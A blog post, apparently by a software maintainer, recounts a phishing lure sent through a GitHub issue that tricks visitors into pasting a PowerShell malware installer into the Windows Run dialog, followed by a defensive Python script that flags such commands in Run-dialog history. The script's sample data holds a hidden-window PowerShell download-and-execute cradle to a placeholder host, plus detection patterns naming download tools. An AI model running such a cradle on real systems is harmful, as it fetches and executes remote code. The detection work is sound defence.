Yesterday, I got an innocent-looking email from a GitHub issue on the IPBan GitHub repository. Here's a screenshot. Please don't type the URL into your browser.
This email passed all DKIM checks and was legitimately sent by GitHub, with the "view on GitHub" and "unsubscribe" links correct. The URL for the "github scanner"? Malicious. When I opened it in my throw-away VM, it contained a button that, when clicked, copied a PowerShell command to the clipboard to install malware, then provided instructions to use the Windows Run command and Ctrl-V to paste it in, installing the virus. Laughing at the audacity of these hackers, I tore down the VM.
When I read the first line, "Hey there!", I was immediately suspicious. As a test, I created a new GitHub issue, #313, and verified that the attackers had deleted the previous issue, #312, to cover their tracks.
As a reminder: if you are not 100% sure a URL is safe, whether it's in an email, on a website, or anywhere else, DON'T click it.
Modern browsers ask for permission before JavaScript can read from or write to the clipboard, so keep your operating system and browser patched to the latest versions, and grant that permission only to websites you trust. Having a virus scanner as a last line of defense is also important, but it is not a guarantee of your safety. Always be cautious, take your time, and never rush to click things or fill out forms.
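The lure above ends with the victim pasting a PowerShell command into the Windows Run dialog, and the Run dialog keeps a history of what was typed or pasted. The following is an added defender-side example, not code from the original post or from IPBan: it parses a constructed snapshot of the RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, where each entry ends in "\1" and MRUList gives the most-recent-first order) and flags commands showing the traits such pasted one-liners rely on. The sample values, the heuristic names and the example.invalid host are constructed for this example; it reads a plain dict so it runs offline rather than touching the live registry.

```python
import re

# Constructed snapshot of HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU,
# the key where the Win+R Run dialog records each command. Real entries end in "\1" and
# MRUList lists the entry names most-recent first. All values below are made up.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": 'powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/x)"\\1',
}

# Traits a pasted PowerShell one-liner from a copy-to-clipboard lure typically shows.
# The names are this example's own labels, not a vendor taxonomy.
SUSPICIOUS_PATTERNS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("policy_bypass", re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I)),
    ("encoded_command", re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{24,}", re.I)),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("download_cradle", re.compile(
        r"\b(?:iwr|invoke-webrequest|curl|wget|downloadstring|mshta|bitsadmin)\b.*https?://", re.I)),
]

def parse_runmru(values):
    """Run-dialog history, most recent first, with the trailing "\\1" marker removed."""
    history = []
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is not None:
            history.append(raw[:-2] if raw.endswith("\\1") else raw)
    return history

def score_command(cmd):
    """Names of the heuristics one command matches (empty list when none)."""
    return [name for name, rx in SUSPICIOUS_PATTERNS if rx.search(cmd)]

def find_suspicious(values):
    """Commands that look like a pasted lure, paired with the traits they matched.
    A download-and-execute cradle alone is enough; otherwise two traits are required."""
    flagged = []
    for cmd in parse_runmru(values):
        hits = score_command(cmd)
        if "download_cradle" in hits or len(hits) >= 2:
            flagged.append((cmd, hits))
    return flagged

if __name__ == "__main__":
    for cmd, hits in find_suspicious(SAMPLE_RUNMRU):
        print(f"SUSPICIOUS: {cmd}\n  traits: {', '.join(hits)}")
```

On a real machine the dict would be filled from the RunMRU key (for instance via winreg) or from an exported .reg file; the heuristics are a triage aid, not a verdict, so review anything flagged alongside the browser history and any process creation logs from the same time.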
More details are in this Reddit thread.